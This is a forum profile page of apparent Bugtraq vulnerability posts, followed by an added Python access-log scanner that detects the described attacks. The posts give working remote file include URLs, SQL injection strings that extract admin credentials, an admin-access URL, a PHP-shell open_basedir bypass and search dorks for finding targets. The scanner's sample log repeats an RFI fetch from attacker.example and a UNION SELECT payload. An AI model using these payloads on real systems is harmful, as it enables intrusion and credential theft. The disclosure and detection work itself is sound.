i...@hotmail.com (i...@hotmail.com)


User Information

Display Name:i...@hotmail.com
Partial Email Address:i...@hotmail.com
Posts:
4 total
4 in Bugtraq

4 Most Recent

1) i...@hotmail.com ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability
| +1 vote
Bugtraq
-----------------------------------------------------------------
Vendor: ActualScripts
URL: http://actualscripts.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "ActualScripts, Company. All rights reserved."
-----------------------------------------------------------------

Exploitation:

/direct.php?rf=http://www.yourspace.com/yourscript.php?
/direct.php?rf=http://www.yourspace.com/yourscript.txt?&ls%20-laF

# PHP Emperor
# [email protected: i...@hotmail.com]
# Greets Dr.ExE , Pro Hackers
2) i...@hotmail.com cPanel OpenBaseDir Bypass
| +1 vote
Bugtraq
Hey
when you try to run a phpshell and open BaseDir is on you will see that:
Open base dir: /home/***/:/usr/lib/php:/usr/local/lib/php:/tmp
Okay.. now run the phpshell with user
like that:
http://server.***.com/~***/phpshell.php
you will see that:
Open base dir: OFF (not secure)
---------------------------------
Found By: PHP Emperor
Greets: Dr.ExE , Pro Hackers
3) i...@hotmail.com Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
| +1 vote
Bugtraq
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability


Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts the username and password of the administrator in clear text.


Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

-------

By PHP Emperor

# i6d[at]hotmail[dot]com
4) i...@hotmail.com phpBazar <= 2.1.0 Multiple vulnerabilities
| +1 vote
Bugtraq
Title: phpBazar <= 2.1.0 Multiple vulnerabilities
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar

Exploits:
-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password: /admin/admin.php?action=edit_member&value=1

# Found By PHP Emperor
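All four posts above describe request patterns that leave a recognisable trace in a web server's access log: a query parameter whose value is an absolute URL (the remote file include attempts against direct.php and classified_right.php), a UNION SELECT payload in a parameter (the layid injection), and an admin page served to an unauthenticated client (the phpBazar admin.php request). The Python below is an added example, not code from any of the posts or from the affected vendors; it parses constructed Common Log Format lines and flags those three patterns for review. The log lines, IP addresses, timestamps and hostnames are constructed; only the parameter names rf, layid and language_dir and the paths are taken from the posts.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access log (Common Log Format); addresses, hosts and times are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2007:10:00:00 +0000] "GET /direct.php?rf=http://attacker.example/shell.txt? HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2007:10:00:01 +0000] "GET /zix/login.asp?layid=-1%20union%20select%201,J_User,J_Pass%20from%20adminLogins HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2007:10:00:02 +0000] "GET /classified_right.php?language_dir=english HTTP/1.1" 200 4096
10.0.0.8 - - [01/Jan/2007:10:00:03 +0000] "GET /admin/admin.php?action=edit_member&value=1 HTTP/1.1" 200 1024
"""

# ip, identity, user, [timestamp], "METHOD target protocol", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A parameter whose value is itself an absolute URL is the signature of an RFI attempt.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Minimal UNION-based injection signature, the technique used in the Zix Forum proof of concept.
SQLI_RE = re.compile(r'\bunion\b.*\bselect\b', re.IGNORECASE | re.DOTALL)


def classify_request(target, status):
    """Return sorted finding labels for one request target (path + query) and its status code."""
    findings = set()
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already percent-decodes once; decode again so a double-encoded
        # payload (%2520 -> %20 -> space) is inspected in its final form.
        decoded = unquote_plus(value)
        if REMOTE_URL_RE.match(decoded):
            findings.add('rfi:' + name)
        if SQLI_RE.search(decoded):
            findings.add('sqli:' + name)
    # An admin page answered with 200 is worth correlating with session/auth data;
    # the phpBazar post describes exactly such an unauthenticated admin request.
    if parts.path.startswith('/admin/') and status == 200:
        findings.add('admin-page-served')
    return sorted(findings)


def scan_log(text):
    """Parse CLF lines and return (ip, target, findings) for every line with at least one finding."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        findings = classify_request(m.group('target'), int(m.group('status')))
        if findings:
            alerts.append((m.group('ip'), m.group('target'), findings))
    return alerts


if __name__ == '__main__':
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, ', '.join(findings), target)
```

Run against the constructed log, the scanner reports the direct.php line as an RFI attempt on rf, the login.asp line as SQL injection on layid, and the admin.php line as an admin page served; the benign language_dir=english request produces no finding. The admin-page rule is deliberately a triage signal rather than a verdict, since legitimate administrators also receive 200 responses.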
